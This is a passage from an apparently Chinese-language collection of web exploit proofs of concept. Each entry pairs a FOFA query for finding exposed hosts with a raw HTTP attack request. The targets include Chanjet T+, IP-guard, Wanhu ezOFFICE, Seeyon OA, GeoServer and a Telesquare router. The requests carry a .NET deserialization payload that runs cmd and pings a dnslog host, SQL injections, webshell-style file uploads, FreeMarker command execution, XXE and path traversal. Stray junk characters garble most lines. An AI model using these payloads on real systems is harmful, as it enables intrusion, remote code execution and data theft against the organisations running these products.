POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1 C( V% i- Z9 `- Q) B1 R. u; c
Host: x.x.x.x/ @, y5 I" U. Y. N7 B, P7 {+ H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36. l0 l5 k `$ Z: \: n
Content-Type: application/json
" T( I+ c: ~$ Q8 N! U; F# L, c, O$ ?
{
2 o% c- a: s0 ~! X* x "storeID":{$ J Y$ k" S$ U
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0 H! p9 a1 ^, a' A: C9 m
"MethodName":"Start",. ` q7 v8 h6 S# H* ?0 F
"ObjectInstance":{7 j7 y1 l) s% J% C7 W
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 c( ^( G o# p- Y, T1 U
"StartInfo": {
' {9 R5 `% K' D: u1 p W "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 P4 e( i% o8 R" Q d6 ]
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
7 t' ^7 I$ v. ? }
9 V* @& A3 o- X9 d4 ?+ v( t }/ `" Y8 X" g9 _: G4 ]/ j# S
}; h; _, w# f& X! _, p; h
}
+ t/ Q5 c/ ^- u, a$ L. ~3 g4 X) D. L8 l) y0 h
& {: I6 R' B8 X- X; N1 h0 S57. 畅捷通T+ keyEdit.aspx SQL注入
' a$ ?1 ~1 V5 [4 K- o w: aFOFA:app="畅捷通-TPlus"+ j3 `3 A/ L) |6 p4 P6 c: ?0 j
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
9 ~( @4 ^" ~3 Q3 v1 E) YHost: host3 m) ~* t7 W8 A, J
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ N* A( G7 B) M! ?8 g
Accept-Charset: utf-8: R& l1 f" F' [" z6 b# h
Accept-Encoding: gzip, deflate
: e& `( s0 b0 c' S/ d3 H1 SConnection: close
) V8 Q8 |; |; c8 a5 E U
6 O8 `" E' y0 V% W: P$ g5 ]0 z- q0 s. V# W& \0 \( P) v6 }' i
58. 畅捷通T+ KeyInfoList.aspx sql注入
6 \/ @$ v- d2 g7 W* q' y5 m" v; yFOFA:app="畅捷通-TPlus"
* m# r) f5 [( `, ?* n7 r. s5 ^$ Y' LGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1# H; S1 k% u4 y+ f8 j) Y
Host: your-ip
" b! A, C: N, R# C6 n* h6 Z* m5 kUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ v; j i. v' f: ?7 H$ X O; I
Accept-Charset: utf-8. O, O* W1 H9 O2 ~
Accept-Encoding: gzip, deflate
2 d5 q1 e# Q7 c- o0 E' A! CConnection: close1 X7 I0 H; l: C9 y, G" }
; x; b( k1 T/ u& w5 @8 ?) U: S/ z
; [# l2 H2 ?3 T( v$ T59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
6 ?. n S: h! n, O: G- p0 OFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
& l5 d0 X) b1 Y( aPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
5 L: B# {7 T5 k3 yHost: 192.168.86.128:9090
( `& r' O# s0 t5 JUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.360 W/ U8 w, i* ?" X4 y& T; D; A, r
Connection: close
^5 |0 G1 s' U) a0 F! |. ^$ A$ SContent-Length: 1669
/ U+ A; _+ n1 f! h `2 BAccept: */*
6 c2 `3 k2 Z; I, ~Accept-Language: en: C8 U4 m! Q# Q# g# Z! f
Content-Type: application/x-www-form-urlencoded: t2 T: J7 y' E' d. ?: D
Accept-Encoding: gzip
: ]+ z. n, a$ P
, s* }7 f& j% p q ^+ U- ^5 B) LPAYLOAD' I0 e* o5 [1 x) w
+ }& g" k. T) E- n2 b4 ~
/ F* d( Z/ P- ~: n, L( u* i/ H7 L' J60. 百卓Smart管理平台 importexport.php SQL注入% S( r6 y ~5 f+ y5 m
FOFA:title="Smart管理平台"2 c, S& k" A- K# S9 V
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
5 o0 c, F {2 i C5 r$ t B5 CHost:; @/ d9 H: N4 X- I% G. P$ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# J' z6 U% P8 ]' h& o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% ^; C5 z+ i4 D
Accept-Encoding: gzip, deflate
( ^& g6 o2 s2 c+ z" l* d6 sAccept-Language: zh-CN,zh;q=0.9
* d! ?- ?( i0 I, j3 {8 u7 }Connection: close
& T, G( b! p% e# F
4 `( U0 C# R$ J# Y/ O# Y5 K& Q% b. u h/ k) G8 y! k B0 j& ]
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
3 v; S- ]2 S1 }) Y' pFOFA: title="欢迎使用浙大恩特客户资源管理系统"
% M* g* n; }) R# n6 qPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
8 L& O& ^) t; _Host: x.x.x.x1 C m$ ]' F1 ]+ b+ E1 Z- j; c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 `# S H9 V0 N- W. P" E( J
Connection: close
9 Y! c! ~+ N: _4 y# V' N# yContent-Length: 27
/ h7 W A/ I0 e5 L! k% h pAccept: */*
8 R% G( @1 |/ e+ y, Q3 X9 }Accept-Encoding: gzip, deflate9 G7 Q4 ]3 f- C. E; u+ |
Accept-Language: en8 w, a% Q$ d* ~" C
Content-Type: application/x-www-form-urlencoded! N) R/ r- n, G( w
- `) U! X6 R9 u) U1 ~
8uxssX66eqrqtKObcVa0kid98xa
% Z* X. P# h$ ?) f
: t) j% R. N: j5 g- @1 U1 z% h
1 M' E* t5 n* \6 t1 t- d W) g62. IP-guard WebServer 远程命令执行
7 |( n5 W% y& fFOFA:"IP-guard" && icon_hash="2030860561"4 P, f: `7 P/ w- O, V5 P8 @; A: A
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
+ g' b) O0 {) \' ~+ S" s. c/ u1 q. o* oHost: x.x.x.x
/ N/ b* N9 W4 X B) aUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36* j' e& b" `! i+ F! I7 A
Connection: close9 I/ \% w* ]4 [" t
Accept: */*0 X3 N N9 w7 M4 u
Accept-Language: en
9 I3 {9 s1 d9 F$ |* g& EAccept-Encoding: gzip, I; x3 B' n3 A$ m% c
2 G) b I* v! T/ c% {
4 [$ c* S/ w/ X5 w5 n2 g' f访问
% A/ d3 D, u2 A) X- e7 a5 s$ S4 n) z
, d L. d9 N* y* K$ LGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1/ b; g4 e3 {* Y0 l- g9 |
Host: x.x.x.x
$ S7 @# d, o. b- w' Y* q5 H4 F$ H9 i/ g* D4 l( }; C
0 Q0 ~4 m' R, J. @8 _+ c
63. IP-guard WebServer任意文件读取
4 s% @& m6 x: n! A: q1 D! Y) W: YIP-guard < 4.82.0609.05 w+ a9 \. r: }1 S, _: W! [5 b
FOFA:icon_hash="2030860561"
! H6 D5 ^, {5 \# e$ j. QPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1# ]4 r; z `# z- V
Host: your-ip. _' r$ t6 W1 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( C+ z& ^* S# U5 d+ Z. N. { V* K0 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ a+ i) i$ L& N4 {, C) dAccept-Encoding: gzip, deflate L1 Q. \( Z. I# N# ?
Accept-Language: zh-CN,zh;q=0.9
. |/ @1 t; q) y {5 [( M" nConnection: close4 y' p. y* a% u+ R
Content-Type: application/x-www-form-urlencoded
5 E; A/ d6 b/ ~, _7 P4 A# P! l- y0 q" f. d* ~4 @
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
6 R+ \( r, \$ Q# Z8 N) a) c8 h, K4 `" o
/ l* D4 \ l* H! q& ^4 q64. 捷诚管理信息系统CWSFinanceCommon SQL注入 Q6 d [0 q" Q' Y; o0 ~
FOFA:body="/Scripts/EnjoyMsg.js"
1 n+ l; t Z0 YPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
7 u/ Y' [4 K7 ^- m. B$ U0 r$ z0 \Host: 192.168.86.128:9001
/ A% ]: X0 B/ d4 RUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
& c- ?( o+ O$ Q# CConnection: close& L8 i4 R" z; A. ?! a
Content-Length: 3697 a! b1 |9 a, ]; W6 |6 u
Accept: */*
( d1 g9 ^4 t/ h, f1 w: f6 ZAccept-Language: en, J" v* N9 Z5 J5 p P: M
Content-Type: text/xml; charset=utf-8
* |' B( O T, F! E' h! r2 FAccept-Encoding: gzip# s d' X7 m0 x% u; M L
( V1 ^/ G& `! [' o/ L9 k L
<?xml version="1.0" encoding="utf-8"?>5 Z) ]6 F2 w; h2 l% T
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
/ a9 [% `5 r ^2 ~/ ?/ `9 k<soap:Body>, y' e2 u3 O: S0 L+ g5 S
<GetOSpById xmlns="http://tempuri.org/">
0 _" ?8 ]9 f$ e b4 q <sId>1';waitfor delay '0:0:5'--+</sId>
( i. _ o1 Y& E </GetOSpById>/ W1 A8 W( m6 m% k; J
</soap:Body>$ w S2 K8 u% k' k1 s
</soap:Envelope>- W3 }" C3 \( f5 u2 d& r0 A
" u, u8 s/ D: J+ e! ]+ x
+ J, ~, H) W0 Q65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过; J4 F+ \, q8 y5 a. Y- x. W
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"6 V4 x' l/ \* z) X
响应200即成功创建账号test123456/123456
4 I: t$ f$ o% v+ ?1 vPOST /SystemMng.ashx HTTP/1.1' |* ]1 T0 s- k! N c" m0 T- a0 L( \
Host:. ~1 v" A" k( t5 w$ y/ P. O4 K
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)# i+ T6 E# u! S; b
Accept-Encoding: gzip, deflate
9 r) h0 Y4 {( LAccept: */*$ G0 F4 B' O3 N/ Z$ b2 A3 r. M; T
Connection: close: T6 E, P* M0 A! R4 P/ P6 v! \
Accept-Language: en r" x/ Z2 w, |, O$ c
Content-Length: 1744 g. G* \) Y. d7 ]) u }7 s! i
$ X7 b' S8 C$ E) w* roperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
# P7 N7 H3 [1 W' N0 t1 [& ?4 C# b! u6 r% S" a
- R2 y, I* b! X8 d) I3 c0 P# L66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% T9 i% ?% u Q, {. U3 u; tFOFA:app="万户ezOFFICE协同管理平台": q. l% s8 P! d
, ]1 F: w- K x, A' ?# }0 h! c- k- [
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
( T, U. a* l8 j% ^Host: x.x.x.x
2 r( B& K) {' l4 Z# P% R4 T& HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) l m' C$ N" [. y7 |, n) ~$ d& k' e: OConnection: close6 W7 A# k7 b" {, D
Accept: */*9 V1 C! i' h8 X$ Q: Q
Accept-Language: en
* X h7 \3 S# dAccept-Encoding: gzip2 a' f+ i/ B$ a& J: V
7 f" x+ H3 X# ^2 G8 x( ?& ^4 \3 |1 r
7 P7 Y8 R0 D1 b5 ]7 W1 ^+ B e& }, ~第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在$ u/ `1 ?* J9 n- u4 b
w, ?, o5 M( G67. 万户ezOFFICE wpsservlet任意文件上传
4 n1 g! Y2 p& c' z: F) ~% z" Q: @FOFA:app="万户网络-ezOFFICE"
$ N% [9 z3 |* L2 xnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型/ j1 a3 V7 W1 @$ i" h T, _1 k' ^
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.17 G3 K% l# v6 Y7 w. s' G0 }* g
Host: x.x.x.x) H* n8 q9 H7 ]. \. z7 W3 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
# \/ F2 V# T7 aContent-Length: 173$ I* i- Q- O4 H4 ?5 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.86 x+ l8 f) o2 H( B% b
Accept-Encoding: gzip, deflate, p4 B6 X! a; ~: W& Q& l
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3; @- N P1 N0 G' \% F& W; f
Connection: close" s/ c% U' V5 v& N# e3 g% A
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp/ v6 Y" u9 F# C; ?7 A5 z# x% W
DNT: 1
$ Z1 n- ^$ {* Y& tUpgrade-Insecure-Requests: 1
# e# P! M/ q X9 {, T# Q2 u" D: K- P2 f% J' s
--ufuadpxathqvxfqnuyuqaozvseiueerp; S: j9 ]. [- k; y7 b" P4 W/ n/ @
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"( T$ c \% X2 d" q6 Q
7 S* A7 Y1 \1 ?+ r: u7 T0 g5 H3 O<% out.print("sasdfghjkj");%>
, B: V) I/ H$ F2 p* x--ufuadpxathqvxfqnuyuqaozvseiueerp--
' E! R& F& K' S" o8 A' Q4 a8 U0 |( R# I; ` z; G5 Y
% `/ K( n! Z) A2 u- h& r0 x文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp/ V5 z# L2 u! Q, C
& y3 L* x, y. e& L- d: S( V' t+ n, b. B68. 万户ezOFFICE wf_printnum.jsp SQL注入: i8 H* n" X. l. S0 B1 i
FOFA:app="万户ezOFFICE协同管理平台"
. O3 B* r t7 O, B/ mGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
C Z6 E' z8 w; o' kHost: {{host}}
- Q" O0 m! s$ f! D. HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
& Q$ p6 _) X6 L2 \7 |Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8' |) Y) k8 `. G( [1 v3 J2 ^8 D
Accept-Encoding: gzip, deflate) X& t; d& M2 W5 ?3 o0 G
Accept-Language: zh-CN,zh;q=0.9
6 k) M% h' n+ I* }8 A- J6 w! u# ~! TConnection: close5 f7 E# i" t& k1 I
3 N* {. r! g) i& J/ p
7 o. i: i9 R- D7 }3 |
69. 万户 ezOFFICE contract_gd.jsp SQL注入4 O0 E( s @ n2 ^+ G
FOFA:app="万户ezOFFICE协同管理平台"; F! Z. G( }5 Z- t% O" P
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
: D2 ~% n: |6 I% |6 b" oHost: your-ip
6 h3 J5 B( ~: P0 XUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; ~) J2 F: z& W1 W4 H- _% J4 [) ~4 k8 J+ CAccept-Encoding: gzip, deflate4 |" b# W; s% Y" o) c
Accept: */*4 }3 g" t4 Y: X8 y7 A, z+ Y
Connection: keep-alive
1 w, T# s- [ Y7 `! s0 E1 b) r- |3 ~9 a( U8 \) [" c
, L; r) i' e. i% Z% z0 J% F7 F
70. 万户ezEIP success 命令执行( D# z& L3 A5 `" E. K4 N- W
FOFA:app="万户网络-ezEIP"! s% D8 w2 P W, Z$ l
POST /member/success.aspx HTTP/1.18 i7 ^) ]/ z% }& U
Host: {{Hostname}}* i. T. \ C$ ^2 i' w3 i* K! c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 P, R: e) c# }; H" VSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=2 E# s+ O; w) Q+ H5 s& e
Content-Type: application/x-www-form-urlencoded
: \' H! l; \& I+ v8 |* |% eTYPE: C
; L& k, p, C: N2 j; m7 {" J: }. UContent-Length: 16702
) A$ j; ?2 X9 I( o2 L9 i" z. S. X
- R& ?9 p- m( Y# K# h__VIEWSTATE=PAYLOAD
0 ^# S+ x: R, N z' M9 k9 \. B$ S8 x- s$ {% K9 S
8 P$ D$ w, U7 \9 y5 b1 s1 D& k
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入6 z! O9 v: _. \5 \* y8 A1 m
FOFA:body="PM2项目管理系统BS版增强工具.zip"
: W, F8 H! R& Y& ?' oGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1* l1 s5 C9 A: `. e
Host: x.x.x.xx.x.x.x5 q$ V' k( `' b6 j, c3 D
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 Z, s: }- z, L( o3 m
Connection: close
8 r0 l& {& C- \: l" w5 \5 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- i# r; ~) g( n2 a
Accept-Encoding: gzip, deflate
3 ] p3 S* O! ^2 M2 A6 I6 p6 J! L- ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; E: [; R' j0 s8 ]' c3 C( _
Upgrade-Insecure-Requests: 18 \: y# _0 \' w! x9 V! ~9 {
0 q0 s4 D8 X: m- l2 K8 G, B. a
" g U! S, k2 _9 j& y& Z1 M5 J72. 致远OA getAjaxDataServlet XXE3 {' G% o; D3 u6 p
FOFA:app="致远互联-OA"& V$ K$ Q3 D8 y) l+ b
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1- Q% m2 |& H$ t3 r3 ^1 Q, e/ A# O
Host: 192.168.40.131:8099. O) N' _) ?/ A3 z r
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36+ F0 H: r! T7 P& U2 N5 |; x' \( q9 Y
Connection: close! ?% r" r( U1 o! @. B2 F
Content-Length: 583( P+ i6 V+ x: _, d8 c8 v: b1 x0 j
Content-Type: application/x-www-form-urlencoded
" v2 n# m' ?8 C8 iAccept-Encoding: gzip
- R" x* i8 F+ t$ s" W& X3 w
9 k8 q' p- r/ L. h0 AS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
6 l/ |. ^3 A1 n- i1 W# r2 I$ O0 e" _2 B1 W4 V1 f
5 U5 ?. p: y& f$ g X73. GeoServer wms远程代码执行
1 x ~, x$ b& a4 YFOFA:icon_hash=”97540678”
6 P1 X4 {8 t$ e l- H2 A- WPOST /geoserver/wms HTTP/1.1
4 {; K9 O2 H# J, }& mHost:
: y& N: Z! i K7 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 u; D$ E! k; }. ~' ^; z
Content-Length: 1981
4 t3 m) s4 I9 Z: ^- e U9 EAccept-Encoding: gzip, deflate
) n" n7 f( S- V d$ _' rConnection: close
V3 n2 t4 {( R( J: rContent-Type: application/xml
% ^ a+ G, o! wSL-CE-SUID: 3* M$ p \4 N- ^3 K% i
) F1 S7 ]# a& R8 O* D( N3 _
PAYLOAD
- Z% r$ ]% A8 W3 t8 x
7 k& m: X+ h6 x4 {3 b$ j# Z7 O J# i5 k
74. 致远M3-server 6_1sp1 反序列化RCE5 {8 x- H' g$ Z* J1 ]
FOFA:title="M3-Server"4 T* V. h1 ?8 N5 y
PAYLOAD; r+ g, m1 T0 W4 W% a
$ ~% m h- i4 s5 F7 Q" {! o75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
0 P7 W" e7 A$ U9 r/ V; oFOFA:app="TELESQUARE-TLR-2005KSH"
- D& s0 \3 K" l7 V- Z/ B2 H) K! RGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1 g2 V4 |4 F B% Q- g# j2 P0 _6 B) I
Host: x.x.x.x
7 h2 W4 A/ [; V- _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; v5 Y+ L: `; J
Connection: close
0 t/ g& X- r6 k, F8 `, aAccept: */*
: M3 ?* p6 y) F1 w4 gAccept-Language: en
- p' q7 R/ `5 G( Q8 X# zAccept-Encoding: gzip: m# V8 _( [* l
) G& B; ~6 B9 f1 `5 g4 I! Y
$ }; X( ^: r6 N8 J) D- z. V. iGET /cgi-bin/test28256.txt HTTP/1.1. ]: i" s( D; D
Host: x.x.x.x
8 |# i$ _ ?+ u; ?/ N, t2 @7 S1 [6 A. E
* O7 \9 Q; i/ g% Z76. 新开普掌上校园服务管理平台service.action远程命令执行
; q1 C1 N" ~3 h- D# w% o" KFOFA:title="掌上校园服务管理平台"
( ^9 W( }1 }2 t3 i' ?: aPOST /service_transport/service.action HTTP/1.1
5 K2 R7 j& `$ q% oHost: x.x.x.x h/ ~3 U# \8 f& t0 i2 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 s( ]& p0 `- V8 G' e, d6 j, d) ?3 D% K
Connection: close1 c4 s9 ^: w% K5 V
Content-Length: 211: X/ g, ^: X" b) O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 n7 T7 A9 l) {Accept-Encoding: gzip, deflate8 R% R6 e4 f4 U0 s# a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* E3 e3 S n1 _" d3 t3 TCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
1 x7 {( |' Q1 l( rUpgrade-Insecure-Requests: 1- G2 Y" i' G6 \" w! N9 x
' _" s( p. {0 `9 O$ E6 \
{
8 Y' t7 B4 e& i+ R1 q"command": "GetFZinfo",! y( a% M; J& b! b, ~! k
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
[ b2 F1 E5 ]1 n! u ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
# p+ d( d# g* \9 i' _}
/ M; A3 r7 T; M8 \8 }: B
+ b, y5 s2 T3 ]+ j# ]% f4 X7 s8 K8 a' \& x9 A
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
* r+ w; ]3 G* {1 WHost: x.x.x.x
) O! v9 |) M4 p
: D# }6 R" }0 C
- t, `# r1 U$ `: P }; o& T. F4 D8 t
: k. `6 m( Y) F9 V \3 R, c& w! b, F+ |77. F22服装管理软件系统UploadHandler.ashx任意文件上传0 p$ b9 i: `5 ]
FOFA:body="F22WEB登陆"& R: f. S* U# _+ D7 e
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
: `# g4 ^; ^9 d8 ~Host: x.x.x.x
( T2 |- N7 S0 A [9 z1 _ AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; j$ \$ u( a0 l0 g. J [% k
Connection: close
5 r! Y% ~, m/ `) Q# VContent-Length: 433$ G6 M3 @+ R; P+ }# K
Accept: */*/ e8 c, E2 A& x D& h: Q
Accept-Encoding: gzip, deflate9 z5 ] X- |+ r6 z
Accept-Language: zh-CN,zh;q=0.9
5 T7 u# ^; R& V& f7 G0 pContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
. O2 D3 E* M. }: R1 c! A5 y2 a! }2 r( h# H+ Y. i
------------398jnjVTTlDVXHlE7yYnfwBoix
: V, h% v5 m5 P ^8 H* wContent-Disposition: form-data; name="folder"- _5 R7 R$ @( K. D% I5 r
8 o% R, L% g+ M9 D/upload/udplog
( G. V8 z" x" z1 F: _& B4 X------------398jnjVTTlDVXHlE7yYnfwBoix
) } U; z1 T5 v* |+ d6 l+ p' xContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
, o3 O& n9 v* |1 E2 tContent-Type: application/octet-stream$ t/ G/ R9 h1 U( p9 D. q
% ~4 d+ u8 [( K) t& Z) U* Q5 |- S6 ?hello1234567& C- A9 S: q# w8 i+ r2 Y8 f
------------398jnjVTTlDVXHlE7yYnfwBoix5 w9 X3 b* w5 L) I t) q, S! ?
Content-Disposition: form-data; name="Upload"
- H) @7 r3 m4 G( `3 g$ X1 ?9 F" g |' {# |/ Q/ ^
Submit Query
8 E5 m1 m1 F: S* G1 t------------398jnjVTTlDVXHlE7yYnfwBoix--
: \5 H- ]; X6 {: ]+ f; `6 g3 y/ m2 W9 l, b8 D+ w7 J2 |) A8 @
( |+ L4 t6 x8 d3 p0 K9 \78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
! z6 f* U& y w6 tFOFA:icon_hash="2001627082"
8 d6 W- A' k0 jPOST /Platform/System/FileUpload.ashx HTTP/1.1' F6 @% d M1 [$ c/ J: G
Host: x.x.x.x
; Q8 i1 @' \4 c) i1 e, W! v- LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: d. W# U9 J0 p) x" a& S
Connection: close
7 d0 M; J0 E' s8 Y+ d! m6 iContent-Length: 336) r) m; \3 ~4 X. {
Accept-Encoding: gzip
, N. E V# l2 q# ]Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l: ]2 @6 K: }( K: {& D* R& N
3 D9 w( Z0 Z2 Y
------YsOxWxSvj1KyZow1PTsh98fdu6l
